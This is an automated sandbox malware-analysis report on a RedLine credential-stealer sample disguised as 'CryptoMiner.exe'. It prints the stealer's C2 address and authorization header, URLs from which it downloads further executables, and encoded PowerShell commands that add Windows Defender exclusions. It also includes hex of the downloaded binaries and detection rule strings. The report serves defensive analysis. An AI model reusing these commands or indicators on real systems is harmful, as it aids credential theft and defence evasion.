Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CryptoMiner.exe

Overview

General Information

Sample Name:CryptoMiner.exe
Analysis ID:620659
MD5:310eb5bd45ac9c5767d28e63ab64635b
SHA1:4ac0d40abb71e9fcff34c8f67511fc590f495f3e
SHA256:d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6
Tags:exe
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Potential dropper URLs found in powershell memory
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Entry point lies outside standard sections
Enables debug privileges
Is looking for software installed on the system
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Classification

Process Tree

  • System is w10x64
  • CryptoMiner.exe (PID: 6428 cmdline: "C:\Users\user\Desktop\CryptoMiner.exe" MD5: 310EB5BD45AC9C5767D28E63AB64635B)
    • InstallUtil.exe (PID: 2140 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)
      • fname.exe (PID: 6720 cmdline: "C:\Users\user\AppData\Local\Temp\fname.exe" MD5: C61F9A9059F8B8BD0E69F7DF4CB09786)
        • conhost.exe (PID: 6712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • AppLaunch.exe (PID: 5972 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
      • filename.exe (PID: 4584 cmdline: "C:\Users\user\AppData\Local\Temp\filename.exe" MD5: C108EBDD14A2CF40E64411792987796A)
        • cmd.exe (PID: 6560 cmdline: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • powershell.exe (PID: 4036 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["65.21.213.209:32936"], "Bot Id": "", "Authorization Header": "a14b52bba3a0ad35d4f66edae1132d42"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.538097603.000000000D730000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000000.00000003.538097603.000000000D730000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0xd20:$pat14: , CommandLine:
        • 0x13958:$v2_1: ListOfProcesses
        • 0x136a7:$v4_3: base64str
        • 0x143b6:$v4_4: stringKey
        • 0x11e17:$v4_5: BytesToStringConverted
        • 0x10931:$v4_6: FromBase64
        • 0x1237a:$v4_8: procName
        00000000.00000003.543077511.000000000D732000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 7 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.3.CryptoMiner.exe.d730000.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                0.3.CryptoMiner.exe.d730000.1.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                • 0xd20:$pat14: , CommandLine:
                • 0x13958:$v2_1: ListOfProcesses
                • 0x136a7:$v4_3: base64str
                • 0x143b6:$v4_4: stringKey
                • 0x11e17:$v4_5: BytesToStringConverted
                • 0x10931:$v4_6: FromBase64
                • 0x1237a:$v4_8: procName
                12.2.InstallUtil.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  12.2.InstallUtil.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0xd20:$pat14: , CommandLine:
                  • 0x13958:$v2_1: ListOfProcesses
                  • 0x136a7:$v4_3: base64str
                  • 0x143b6:$v4_4: stringKey
                  • 0x11e17:$v4_5: BytesToStringConverted
                  • 0x10931:$v4_6: FromBase64
                  • 0x1237a:$v4_8: procName
                  12.0.InstallUtil.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    Click to see the 11 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    Timestamp:05/05/22-03:30:52.519175 05/05/22-03:30:52.519175
                    SID:2850286
                    Source Port:49796
                    Destination Port:32936
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/05/22-03:30:54.158486 05/05/22-03:30:54.158486
                    SID:2850286
                    Source Port:49796
                    Destination Port:32936
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/05/22-03:30:54.966150 05/05/22-03:30:54.966150
                    SID:2850286
                    Source Port:49796
                    Destination Port:32936
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/05/22-03:30:46.265169 05/05/22-03:30:46.265169
                    SID:2850286
                    Source Port:49796
                    Destination Port:32936
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/05/22-03:30:55.048172 05/05/22-03:30:55.048172
                    SID:2850286
                    Source Port:49796
                    Destination Port:32936
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/05/22-03:30:51.349484 05/05/22-03:30:51.349484
                    SID:2850286
                    Source Port:49796
                    Destination Port:32936
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/05/22-03:30:51.712280 05/05/22-03:30:51.712280
                    SID:2850286
                    Source Port:49796
                    Destination Port:32936
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/05/22-03:30:52.800684 05/05/22-03:30:52.800684
                    SID:2850286
                    Source Port:49796
                    Destination Port:32936
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/05/22-03:30:52.844061 05/05/22-03:30:52.844061
                    SID:2850286
                    Source Port:49796
                    Destination Port:32936
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/05/22-03:30:55.007583 05/05/22-03:30:55.007583
                    SID:2850286
                    Source Port:49796
                    Destination Port:32936
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/05/22-03:30:40.973991 05/05/22-03:30:40.973991
                    SID:2850286
                    Source Port:49796
                    Destination Port:32936
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/05/22-03:30:32.990118 05/05/22-03:30:32.990118
                    SID:2850027
                    Source Port:49796
                    Destination Port:32936
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/05/22-03:30:46.475836 05/05/22-03:30:46.475836
                    SID:2850286
                    Source Port:49796
                    Destination Port:32936
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/05/22-03:30:52.885401 05/05/22-03:30:52.885401
                    SID:2850286
                    Source Port:49796
                    Destination Port:32936
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/05/22-03:30:51.428831 05/05/22-03:30:51.428831
                    SID:2850286
                    Source Port:49796
                    Destination Port:32936
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/05/22-03:30:51.508362 05/05/22-03:30:51.508362
                    SID:2850286
                    Source Port:49796
                    Destination Port:32936
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/05/22-03:30:34.048200 05/05/22-03:30:34.048200
                    SID:2850286
                    Source Port:49796
                    Destination Port:32936
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/05/22-03:30:54.760590 05/05/22-03:30:54.760590
                    SID:2850286
                    Source Port:49796
                    Destination Port:32936
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/05/22-03:30:34.088289 05/05/22-03:30:34.088289
                    SID:2850353
                    Source Port:32936
                    Destination Port:49796
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/05/22-03:30:54.711716 05/05/22-03:30:54.711716
                    SID:2850286
                    Source Port:49796
                    Destination Port:32936
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:05/05/22-03:30:51.576541 05/05/22-03:30:51.576541
                    SID:2850286
                    Source Port:49796
                    Destination Port:32936
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: http://45.9.20.31/rigx.exeAvira URL Cloud: Label: malware
                    Source: http://45.9.20.31/asdasdasd.exeAvira URL Cloud: Label: malware
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeAvira: detection malicious, Label: HEUR/AGEN.1221911
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeAvira: detection malicious, Label: TR/AD.GenSteal.jziki
                    Found malware configuration
                    Source: 12.0.InstallUtil.exe.400000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["65.21.213.209:32936"], "Bot Id": "", "Authorization Header": "a14b52bba3a0ad35d4f66edae1132d42"}
                    Multi AV Scanner detection for submitted file
                    Source: CryptoMiner.exeReversingLabs: Detection: 16%
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeMetadefender: Detection: 28%Perma Link
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeReversingLabs: Detection: 80%
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeMetadefender: Detection: 31%Perma Link
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeReversingLabs: Detection: 69%
                    Machine Learning detection for sample
                    Source: CryptoMiner.exeJoe Sandbox ML: detected
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\filename.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\fname.exeJoe Sandbox ML: detected
                    Source: CryptoMiner.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior
                    Source: CryptoMiner.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: C:\At8uAy02fG4K0d\a4ma7t7o\T3MNiT0siyfS.pdb source: CryptoMiner.exe
                    Source: Binary string: s.pdB source: filename.exe.12.dr

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2850027 ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.5:49796 -> 65.21.213.209:32936
                    Source: TrafficSnort IDS: 2850286 ETPRO TROJAN Redline Stealer TCP CnC Activity 192.168.2.5:49796 -> 65.21.213.209:32936
                    Source: TrafficSnort IDS: 2850353 ETPRO MALWARE Redline Stealer TCP CnC - Id1Response 65.21.213.209:32936 -> 192.168.2.5:49796
                    May check the online IP address of the machine
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDNS query: name: ip-api.com
                    Potential dropper URLs found in powershell memory
                    Source: powershell.exe, 0000001D.00000002.698158911.000001C92E7EF000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateDatah
                    Source: powershell.exe, 0000001D.00000002.698158911.000001C92E7EF000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
                    Source: powershell.exe, 0000001D.00000002.698158911.000001C92E7EF000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
                    Source: global trafficHTTP traffic detected: GET /asdasdasd.exe HTTP/1.1Host: 45.9.20.31Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /rigx.exe HTTP/1.1Host: 45.9.20.31
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 05 May 2022 01:30:55 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 29 Apr 2022 17:53:48 GMTETag: "381d98-5ddceb97b6ef9"Accept-Ranges: bytesContent-Length: 3677592Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6b 5c 38 f4 2f 3d 56 a7 2f 3d 56 a7 2f 3d 56 a7 3b 56 55 a6 21 3d 56 a7 3b 56 53 a6 87 3d 56 a7 3b 56 52 a6 39 3d 56 a7 7d 48 52 a6 3e 3d 56 a7 7d 48 55 a6 3b 3d 56 a7 7d 48 53 a6 65 3d 56 a7 3b 56 57 a6 2a 3d 56 a7 2f 3d 57 a7 72 3d 56 a7 93 48 53 a6 2e 3d 56 a7 93 48 54 a6 2e 3d 56 a7 52 69 63 68 2f 3d 56 a7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 29 01 00 00 d0 03 00 00 dd 02 00 00 e0 00 02 01 0b 01 b8 1d 00 b2 12 00 00 4a 02 00 00 00 00 00 b1 30 22 00 00 10 00 00 00 d0 12 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 57 02 00 00 06 00 00 00 00 00 00 00 00 e0 37 00 00 04 00 00 ff 02 00 00 03 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 39 60 15 00 50 00 00 00 00 d0 37 00 db 08 00 00 00 00 00 00 00 00 00 00 68 d4 37 00 30 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4a 49 43 65 62 6f 51 00 35 5e 10 00 00 10 00 00 00 60 10 00 00 04 00 00 84 02 00 00 61 03 00 00 63 03 f7 00 20 00 00 60 7a 63 50 6c 74 00 00 00 75 50 02 00 00 70 10 00 00 52 02 00 00 64 10 00 6d 01 00 00 0b 03 00 00 7d 03 54 02 20 00 00 60 72 72 46 35 74 61 00 00 a0 f3 01 00 00 d0 12 00 00 f4 01 00 00 b6 12 00 df 01 00 00 3f 00 00 00 2e 00 b8 02 40 00 00 40 49 4b 62 67 61 00 00 00 f0 1c 00 00 00 d0 14 00 00 10 00 00 00 aa 14 00 1c 03 00 00 bb 02 00 00 ee 02 5b 01 40 00 00 c0 30 33 41 41 6f 63 00 00 dc 2d 00 00 00 f0 14 00 00 2e 00 00 00 ba 14 00 fc 01 00 00 57 02 00 00 1a 02 32 03 40 00 00 42 36 6d 61 54 71 77 00 00 00 40 00 00 00 20 15 00 00 40 00 00 00 e8 14 00 0a 01 00 00 9b 02 00 00 08 03 b2 01 40 00 00 c0 50 4b 6d 59 74 61 00 00 00 10 00 00 00 60 15 00 00 02 00 00 00 28 15 00 5c 03 00 00 4f 03 00 00 c0 03 3d 03 40 00 00 c0 67 54 78 31 71 77 00 00 00 60 22 00 00 70 15 00 00 60 22 00 00 2a 15 00 3e 01 00 00 75 02 00 00 39 03 e4 03 60 00 00 e0 39 59 52 74 63 00 00 00 db 08 00 00 00 d0 37 00 00 0a 00 00 00 8a 37 00 6b 00 00 00 15 00 00 00 5c 00 d1 02 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 05 May 2022 01:30:58 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 21 Apr 2022 17:31:37 GMTETag: "4a7400-5dd2d7b6f9253"Accept-Ranges: bytesContent-Length: 4879360Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 53 94 61 62 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0b 00 00 6c 4a 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 4a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 4a 00 f6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 6b 4a 00 00 20 00 00 00 6c 4a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f6 05 00 00 00 a0 4a 00 00 06 00 00 00 6e 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 02 00 05 00 04 fe 49 00 ac 8d 00 00 01 00 00 00 3b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 f3 02 a8 ee 4f 1c c4 eb 33 07 16 13 14 d9 37 48 ba 9a 90 8f 0f 21 25 d8 ac ec b2 67 fc 9c 13 7b f5 4e ed 17 3f ea 18 79 89 c3 bd 87 14 1e 33 93 d9 1f de c2 6e e7 f1 39 f1 5d 27 8a 9f ec 0f 55 5d bb 38 57 38 fe c9 34 3a 11 0b 29 a4 8f ef 2e 39 b4 50 ca 72 64 0e f3 22 6f 7e 6e b5 8d 8f ea 4b e8 15 2a c5 9b 89 1e c7 82 61 6e 86 ab 96 ec 1d fa a7 76 45 e1 0e dc 60 2f 4e 88 ac e5 5e 97 ba c0 48 e5 c7 88 9b 1e 0e e8 1c 6e 65 14 27 f6 be 57 8b 14 5c 54 10 ba c3 86 c9 40 de 5b 06 7f 05 46 a8 32 b5 d0 be 98 63 5d af f6 75 88 b5 49 cf 67 12 4d 0d ab 20 24 c7 3e a7 97 77 d7 49 6c 40 21 20 3d 3b 8e 6a 9e 08 2d 81 80 64 20 aa 5c 34 08 c3 47 40 3d 06 cd 70 3f cd 91 42 37 17 e3 ce 43 94 6b d4 4a 7a 83 0b 1c 32 72 7e b7 60 dd ab 6d b9 f2 9c cc bb db a1 8e 1e 88 49 6e 5d c0 fb 87 64 c1 d8 f1 51 bb a1 5d 00 22 de db e4 66 49 d6 75 eb c9 f5 82 0b 2c 0e 39 cf e1 93 70 5a 8c 8f 42 c1 69 49 6a 9b 0d 92 99 cd 15 a5 02 3b 63 cd 3c 33 a3 65 3e ef 79 94 1c 67 b5 ab fe 1d 54 66 5a a3 4d f8 c5 26
                    Source: Joe Sandbox ViewASN Name: CP-ASDE CP-ASDE
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: global trafficTCP traffic: 192.168.2.5:49796 -> 65.21.213.209:32936
                    Source: InstallUtil.exe, 0000000C.00000002.659462830.0000000002F67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.31
                    Source: InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.659462830.0000000002F67000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.31/asdasdasd.exe
                    Source: InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.659673561.0000000002F79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.31/rigx.exe
                    Source: InstallUtil.exe, 0000000C.00000002.659462830.0000000002F67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.314Vl
                    Source: InstallUtil.exe, 0000000C.00000002.659673561.0000000002F79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.31D8VlL
                    Source: fname.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                    Source: InstallUtil.exe, 0000000C.00000002.659673561.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, fname.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: InstallUtil.exe, 0000000C.00000002.659673561.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, fname.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                    Source: InstallUtil.exe, 0000000C.00000002.659673561.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, fname.exe.12.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: fname.exe.12.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: powershell.exe, 0000001D.00000002.695979434.000001C92E4EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: InstallUtil.exe, 0000000C.00000002.659673561.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, fname.exe.12.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                    Source: InstallUtil.exe, 0000000C.00000002.659673561.0000000002F79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.co
                    Source: fname.exe.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: InstallUtil.exe, 0000000C.00000002.659673561.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, fname.exe.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                    Source: fname.exe.12.drString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                    Source: InstallUtil.exe, 0000000C.00000002.659673561.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, fname.exe.12.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                    Source: fname.exe.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: InstallUtil.exe, 0000000C.00000002.659673561.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, fname.exe.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: fname.exe.12.drString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
